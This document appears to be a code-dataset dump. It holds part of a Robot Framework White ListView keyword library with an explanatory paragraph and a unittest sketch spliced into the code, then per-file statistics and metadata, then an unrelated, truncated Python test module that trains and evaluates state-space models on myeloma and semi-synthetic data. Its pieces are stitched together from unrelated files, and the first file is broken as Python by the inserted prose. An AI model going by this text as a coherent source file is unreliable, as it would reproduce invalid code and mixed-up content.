"""Right clicks a listview row that has given text in given column.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
row = self._get_row(locator, column_name, cell_text)
Clicks.right_click(row, x_offset, y_offset)
@keyword
def right_click_listview_row_by_index(self, locator, row_index, x_offset=0, y_offset=0):
"""Right clicks a listview row at index.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
row = self._get_row_by_index(locator, row_index)
Clicks.right_click(row, x_offset, y_offset)
@keyword
def right_click_listview_row_by_text(self, locator, text, x_offset=0, y_offset=0):
"""Right clicks a listview row with matching text.
See `Double Click Listview Row By Text` for details about arguments ``locator`` and ``text``.
"""
row = self._get_row_by_text(locator, text)
Clicks.right_click(row, x_offset, y_offset)
@keyword
def select_listview_cell(self, locator, column_name, row_index):
"""Selects a listview cell.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
cell.Click()
@keyword
def select_listview_cell_by_index(self, locator, row_index, column_index):
"""Selects a listview cell at index.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
cell.Click()
@keyword
def select_listview_row(self, locator, column_name, cell_text):
"""Selects a listview row.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
listview = self.state._get_typed_item_by_locator(ListView, locator)
listview.Select(column_name, cell_text)
@keyword
def select_listview_row_by_index(self, locator, row_index):
"""Selects a listview row at index.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
listview = self.state._get_typed_item_by_locator(ListView, locator)
listview.Select(int(row_index))
@keyword
def select_listview_row_by_text(self, locator, text):
"""Selects a listview row with matching text.
See `Double Click Listview Row By Text` for details about arguments ``locator`` and ``text``.
"""
row = self._get_row_by_text(locator, text)
row.Select()
def _get_row(self, locator, column_name, cell_text):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return listview.Rows.Get(column_name, cell_text)
def _get_row_by_index(self, locator, index):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return listview.Rows.Get(int(index))
def _get_row_by_text(self, locator, text):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return next((row for row in listview.Rows if row.Cells[0].Text == text), None)
def _get_cell(self, locator, column_name, row_index):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return listview.Cell(column_name, int(row_index))
def _get_cell_by_index(self, locator, row, column):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return listview.Rows.Get(int(row)).Cells[int(column)]
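Because every White lookup goes through self.state and the _get_* helpers, individual keywords can be exercised without a running application by stubbing that lookup. The following is a minimal sketch of such a test (illustrative only, not part of the library): it assumes ListViewKeywords is importable as defined above and bypasses LibraryComponent.__init__ via __new__, which presumes these keywords need no other state.
import unittest
from unittest.mock import MagicMock

class ListViewCellTextSketchTest(unittest.TestCase):
    def test_cell_text_should_be_passes_on_exact_match(self):
        keywords = ListViewKeywords.__new__(ListViewKeywords)  # skip LibraryComponent setup
        keywords.state = MagicMock()
        cell = MagicMock(Text='Helsinki')
        listview = MagicMock()
        listview.Cell.return_value = cell
        keywords.state._get_typed_item_by_locator.return_value = listview
        # Exact match: the keyword should return without raising AssertionError.
        keywords.listview_cell_text_should_be('id:addressList', 'City', 0, 'Helsinki')
        listview.Cell.assert_called_once_with('City', 0)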
| 44.582051
| 143
| 0.663312
| 2,329
| 17,387
| 4.733791
| 0.052383
| 0.056599
| 0.06322
| 0.051882
| 0.919546
| 0.907302
| 0.881542
| 0.848345
| 0.805533
| 0.783401
| 0
| 0.001884
| 0.236901
| 17,387
| 389
| 144
| 44.696658
| 0.829062
| 0.386381
| 0
| 0.59887
| 0
| 0
| 0.054149
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 1
| 0.20339
| false
| 0
| 0.022599
| 0
| 0.293785
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
acc5a957f7978a488db2be4a2fadcbaf6c20b376
| 49,991
|
py
|
Python
|
ief_core/tests/old_tests/test_ssm.py
|
zeshanmh/ief
|
1b7dbd340ecb8ccf40d22de989e3bc3d92135a45
|
[
"MIT"
] | 5
|
2021-04-11T04:49:24.000Z
|
2022-03-28T18:43:45.000Z
|
ief_core/tests/old_tests/test_ssm.py
|
clinicalml/ief
|
97bcaad85ec820fbe062a86c6c500a308904f029
|
[
"MIT"
] | 1
|
2021-12-13T06:33:16.000Z
|
2021-12-16T02:04:14.000Z
|
ief_core/tests/old_tests/test_ssm.py
|
zeshanmh/ief
|
1b7dbd340ecb8ccf40d22de989e3bc3d92135a45
|
[
"MIT"
] | 1
|
2020-12-21T14:01:29.000Z
|
2020-12-21T14:01:29.000Z
|
import torch
import torch.nn as nn
import numpy as np
import pytorch_lightning as pl
import sys
import os
import optuna
from lifelines.utils import concordance_index
from sklearn.metrics import r2_score
from torch.utils.data import DataLoader, TensorDataset
from torchcontrib.optim import SWA
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from argparse import ArgumentParser
from distutils.util import strtobool
sys.path.append('../')
sys.path.append('../../data/ml_mmrf')
sys.path.append('../../data/')
from ml_mmrf_v1.data import load_mmrf
from synthetic.synthetic_data import load_synthetic_data_trt, load_synthetic_data_noisy
from semi_synthetic.ss_data import *
from models.ssm.ssm import SSM, SSMAtt
from models.ssm.ssm_baseline import SSMBaseline
def test_ssm_sota():
sys.path.append('../../../trvae')
sys.path.append('../../../trvae/dmm')
sys.path.append('../../../trvae/models')
from dmm import DMM
ddata = load_ss_data(1000, gen_fly=True, eval_mult=500, in_sample_dist=False, add_missing=True)
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
# _, valid_loader = load_ss_helper(ddata, tvt='valid', device=device, bs=600)
dim_stochastic = 48; dim_hidden = 300
dim_base = ddata['train']['B'].shape[-1]
dim_data = ddata['train']['X'].shape[-1]
dim_treat = ddata['train']['A'].shape[-1]
C = 0.01; ttype = 'gated'; etype = 'lin'
model = DMM(dim_stochastic, dim_hidden, dim_base, dim_data, dim_treat, C = C, ttype = ttype, etype=etype,
inftype = 'rnn_relu', combiner_type = 'pog', include_baseline = True, reg_type = 'l1', reg_all=True, augmented=False)
model.to(device)
fname = '../../../trvae/dmm/good_models/sota_ssm_mm.pt'
print ('loading',fname)
model.load_state_dict(torch.load(fname))
print(f'eval set size: {ddata["valid"][0]["X"].shape}')
nelbos = []
for i in range(5):
_, valid_loader = load_ss_helper(ddata, tvt='valid', bs=600, device=device, valid_fold=i)
batch_nelbos = []
for i_batch, valid_batch_loader in enumerate(valid_loader):
(nelbo, nll, kl, _), _ = model.forward_unsupervised(*valid_batch_loader, anneal = 1.)
nelbo, nll, kl = nelbo.item(), nll.item(), kl.item()
batch_nelbos.append(nelbo)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
nelbos.append(np.mean(batch_nelbos))
print(f'NELBO (on ss data) of trained model from which semi-synthetic dataset was sampled: {np.mean(nelbos)}, std: {np.std(nelbos)}')
# batch_nelbos = []
# for i_batch, valid_batch_loader in enumerate(valid_loader):
# (nelbo, nll, kl, _), _ = model.forward_unsupervised(*valid_batch_loader, anneal = 1.)
# nelbo, nll, kl = nelbo.item(), nll.item(), kl.item()
# batch_nelbos.append(nelbo)
# (nelbo, nll, kl, _), _ = model.forward_unsupervised(*valid_loader.dataset.tensors, anneal = 1.)
# print(f'NELBO (on ss data) of trained model from which semi-synthetic dataset was sampled: {np.mean(batch_nelbos)}')
def test_ssm_load():
checkpoint_path = '../tbp_logs/ssm_lin_semi_synthetic_subsample_best_epoch=03689-val_loss=-225.67.ckpt'
checkpoint = torch.load(checkpoint_path, map_location=lambda storage, loc: storage)
hparams = checkpoint['hyper_parameters']
ssm = SSM(**hparams); ssm.setup(1)
ssm.load_state_dict(checkpoint['state_dict'])
assert 'dim_data' in ssm.hparams
assert 'dim_treat' in ssm.hparams
assert 'dim_base' in ssm.hparams
assert ssm.hparams['ttype'] == 'lin'
valid_loader = ssm.val_dataloader()
(nelbo, nll, kl, _), _ = ssm.forward(*valid_loader.dataset.tensors, anneal = 1.)
print(nelbo)
def run_ssm_ss():
seed_everything(0)
model_configs = [ # samples, ttype, ds, C, reg_all, reg_type, lr
# (1000, 'lin', 41, 0.007191, False, 'l2', .004308),
# (1500, 'lin', 60, 0.0022656, True, 'l2', .0041245),
# (2000, 'lin', 49, 0.0466374, True, 'l2', .0046789),
# (1000, 'lin', 48, 0.01, False, 'l2', 1e-3),
# (1500, 'lin', 48, 0.01, False, 'l2', 1e-3),
# (2000, 'lin', 48, 0.01, False, 'l2', 1e-3),
# (10000, 'lin', 22, 0.002625, False, 'l2', .0033782),
(1000, 'lin', 48, 0.01, True, 'l2', 1e-3),
(1500, 'gated', 48, 0.01, True, 'l2', 1e-3),
(2000, 'gated', 48, 0.01, False, 'l2', 1e-3)
# (10000, 'gated', 55, 0.001212, False, 'l1', .0037642)
]
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm_baseline', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=True, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=True, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from FOMM and base trainer
parser = SSMBaseline.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
# fi = open('./ssm_ss_results.txt', 'w')
for k,model_config in enumerate(model_configs):
nsamples_syn, ttype, dim_stochastic, C, reg_all, reg_type, lr = model_config
args.max_epochs = 10000
args.nsamples_syn = nsamples_syn
args.ttype = ttype
args.dim_stochastic = dim_stochastic
args.dim_hidden = 300
args.alpha1_type = 'linear'
args.add_stochastic = False
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
args.lr = lr
dict_args = vars(args)
trial = optuna.trial.FixedTrial({'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
# initialize FOMM w/ args and train
model = SSMBaseline(trial, **dict_args)
in_sample_dist = model.hparams.ss_in_sample_dist; add_missing = model.hparams.ss_missing
print(f'[RUNNING] model config {k+1}: N = {args.nsamples_syn}, ttype = {args.ttype}, C = {args.C}, reg_all = {args.reg_all}, reg_type = {args.reg_type}, in_sample_dist = {in_sample_dist}, add_missing = {add_missing}')
# fi.write(f'[RUNNING] model config {k+1}: N = {args.nsamples_syn}, ttype = {args.ttype}, C = {args.C}, reg_all = {args.reg_all}, reg_type = {args.reg_type}, in_sample_dist = {in_sample_dist}, add_missing = {add_missing}\n')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[2], check_val_every_n_epoch=10)
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:2')
else:
device = torch.device('cpu')
ddata = load_ss_data(model.hparams['nsamples_syn'], gen_fly=True, eval_mult=200, in_sample_dist=in_sample_dist, add_missing=add_missing)
print(f'eval set size: {ddata["valid"][0]["X"].shape}')
nelbos = []
for i in range(1,5):
_, valid_loader = load_ss_helper(ddata, tvt='valid', bs=model.hparams['bs'], device=device, valid_fold=i)
batch_nelbos = []
for i_batch, valid_batch_loader in enumerate(valid_loader):
(nelbo, nll, kl, _), _ = model.forward(*valid_batch_loader, anneal = 1.)
nelbo, nll, kl = nelbo.item(), nll.item(), kl.item()
batch_nelbos.append(nelbo)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
nelbos.append(np.mean(batch_nelbos))
print(f'[COMPLETE] model config {k+1}: mean nelbo: {np.mean(nelbos)}, std nelbo: {np.std(nelbos)}')
# fi.write(f'[COMPLETE] model config {k+1}: mean nelbo: {np.mean(nelbos)}, std nelbo: {np.std(nelbos)}\n\n')
print()
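# Editorial sketch (not in the original test module): run_ssm_ss, run_ssm_ss2 and the
# test_ssm_* functions below rebuild an almost identical ArgumentParser each time. A helper
# along these lines could factor out the shared flags; the argument names mirror the ones
# used above, and anything dataset-specific is left to the caller.
def build_common_ssm_parser(model_name='ssm', dataset='mm', bs=600, loss_type='unsup'):
    parser = ArgumentParser()
    parser.add_argument('--model_name', type=str, default=model_name, help='fomm, ssm, or gru')
    parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
    parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
    parser.add_argument('--fname', type=str, help='name of save file')
    parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
    parser.add_argument('--nsamples', default=1, type=int)
    parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
    parser.add_argument('--optimizer_name', type=str, default='adam')
    parser.add_argument('--dataset', default=dataset, type=str)
    parser.add_argument('--eval_type', type=str, default='nelbo')
    parser.add_argument('--loss_type', type=str, default=loss_type)
    parser.add_argument('--bs', default=bs, type=int, help='batch size')
    parser.add_argument('--fold', default=1, type=int)
    parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
    parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
    return parser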
def run_ssm_ss2():
seed_everything(1)
# model_configs = [
# (1000, 'moe', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2
# (1500, 'moe', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2
# (2000, 'moe', 48, 0.01, True, 'l2') # 48.000, 0.010000, 1.0000, l2
# ]
model_configs = [
(1000, 'lin', 64, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2 -86.93002059979317, std nelbo: 2.308720455440082
(1500, 'lin', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 0.0000, l2 -90.58635519101071, std nelbo: 3.337732785962744
(2000, 'lin', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 0.0000, l2 -80.53742721753244, std nelbo: 0.9132054166247399
(1000, 'gated', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2 -55.076445347223526, std nelbo: 4.1150217727133525
(1000, 'gated', 64, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2
(1500, 'gated', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2 -93.4233535405917, std nelbo: 2.099412335001398
(2000, 'gated', 64, 0.01, True, 'l2'), # 48.000, 0.010000, 0.0000, l2
# (21000, 'gated', 48, 0.01, False, 'l2') # 48.000, 0.010000, 1.0000, l2 #-173.1242269819433, std nelbo: 0.53154754771723
]
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='semi_synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=1000, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=True, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from FOMM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
for k,model_config in enumerate(model_configs):
nsamples_syn, ttype, dim_stochastic, C, reg_all, reg_type = model_config
args.max_epochs = 10000
args.nsamples_syn = nsamples_syn
args.ttype = ttype
args.dim_stochastic = dim_stochastic
args.dim_hidden = 300
args.alpha1_type = 'linear'
args.add_stochastic = False
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
dict_args = vars(args)
# initialize FOMM w/ args and train
model = SSM(**dict_args)
in_sample_dist = model.hparams.ss_in_sample_dist; add_missing = model.hparams.ss_missing
print(f'[RUNNING] model config {k+1}: N = {args.nsamples_syn}, ttype = {args.ttype}, C = {args.C}, reg_all = {args.reg_all}, reg_type = {args.reg_type}, in_sample_dist = {in_sample_dist}, add_missing = {add_missing}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[0], check_val_every_n_epoch=10)
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
ddata = load_ss_data(model.hparams['nsamples_syn'], gen_fly=True, eval_mult=200, in_sample_dist=in_sample_dist, add_missing=add_missing)
print(f'eval set size: {ddata["valid"][0]["X"].shape}')
nelbos = []
for i in range(1,5):
_, valid_loader = load_ss_helper(ddata, tvt='valid', bs=model.hparams['bs'], device=device, valid_fold=i)
batch_nelbos = []
for i_batch, valid_batch_loader in enumerate(valid_loader):
(nelbo, nll, kl, _), _ = model.forward(*valid_batch_loader, anneal = 1.)
nelbo, nll, kl = nelbo.item(), nll.item(), kl.item()
batch_nelbos.append(nelbo)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
nelbos.append(np.mean(batch_nelbos))
print(f'[COMPLETE] model config {k+1}: mean nelbo: {np.mean(nelbos)}, std nelbo: {np.std(nelbos)}')
print()
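# Editorial sketch (not in the original file): the per-fold NELBO evaluation loop above is
# duplicated in run_ssm_ss and run_ssm_ss2. A shared helper along these lines would return
# the mean and std across validation folds; it assumes the same load_ss_helper signature
# and model.forward return shape used above.
def evaluate_nelbo_over_folds(model, ddata, device, bs, folds=range(1, 5)):
    fold_nelbos = []
    for fold in folds:
        _, valid_loader = load_ss_helper(ddata, tvt='valid', bs=bs, device=device, valid_fold=fold)
        batch_nelbos = []
        for valid_batch in valid_loader:
            # model.forward returns ((nelbo, nll, kl, extra), other); only the NELBO is kept here.
            (nelbo, _, _, _), _ = model.forward(*valid_batch, anneal=1.)
            batch_nelbos.append(nelbo.item())
        fold_nelbos.append(np.mean(batch_nelbos))
    return np.mean(fold_nelbos), np.std(fold_nelbos)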
def test_ssm_semi_synthetic():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='semi_synthetic', type=str)
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=True, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 100
args.ttype = 'gated'
args.alpha1_type = 'linear'
args.add_stochastic = False
args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
# args.C = 0.01; args.reg_all = False; args.reg_type = 'l2'
dict_args = vars(args)
# initialize FOMM w/ args and train
model = SSM(**dict_args)
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[3])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:3')
else:
device = torch.device('cpu')
# ddata = load_ss_data(model.hparams['nsamples_syn'], gen_fly=True)
ddata = model.ddata
_, valid_loader = load_ss_helper(ddata, tvt='valid', bs=model.hparams['bs'], device=device)
(nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
print(f'nelbo: {nelbo}')
    assert abs(nelbo.item() - 306) < 3e-1
def test_ssm_linear_mm():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 100
args.ttype = 'gated'
args.dim_stochastic = 48
args.dim_hidden = 300
dict_args = vars(args)
# initialize FOMM w/ args and train
model = SSM(**dict_args)
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[1])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:1')
else:
device = torch.device('cpu')
_, valid_loader = model.load_helper('valid', device=device)
(nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
    assert abs(nelbo.item() - 253.4) < 3e-1
def test_ssm_lin_mm(ttype='lin', fold=1, reg_all=False, C=0.01, reg_type='l1', ds=16, dh=300):
print(f'[FOLD: {fold}, REG_ALL: {reg_all}]')
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=fold, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
# args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = ds
args.dim_hidden = dh
dict_args = vars(args)
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/mmfold' + str(fold) + '_ssm_' + ttype + '_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
def test_ssm_nl_mm(ttype='nl', fold=1, reg_all=False, C=0.01, reg_type='l1', ds=16, dh=300):
print(f'[FOLD: {fold}, REG_ALL: {reg_all}]')
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=fold, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
# args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = ds
args.dim_hidden = dh
dict_args = vars(args)
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/mmfold' + str(fold) + '_ssm_' + ttype + '_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[1])
trainer.fit(model)
def test_ssm_moe_mm(ttype='moe', fold=1, reg_all=False, C=0.01, reg_type='l1', ds=16, dh=300):
print(f'[FOLD: {fold}, REG_ALL: {reg_all}]')
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
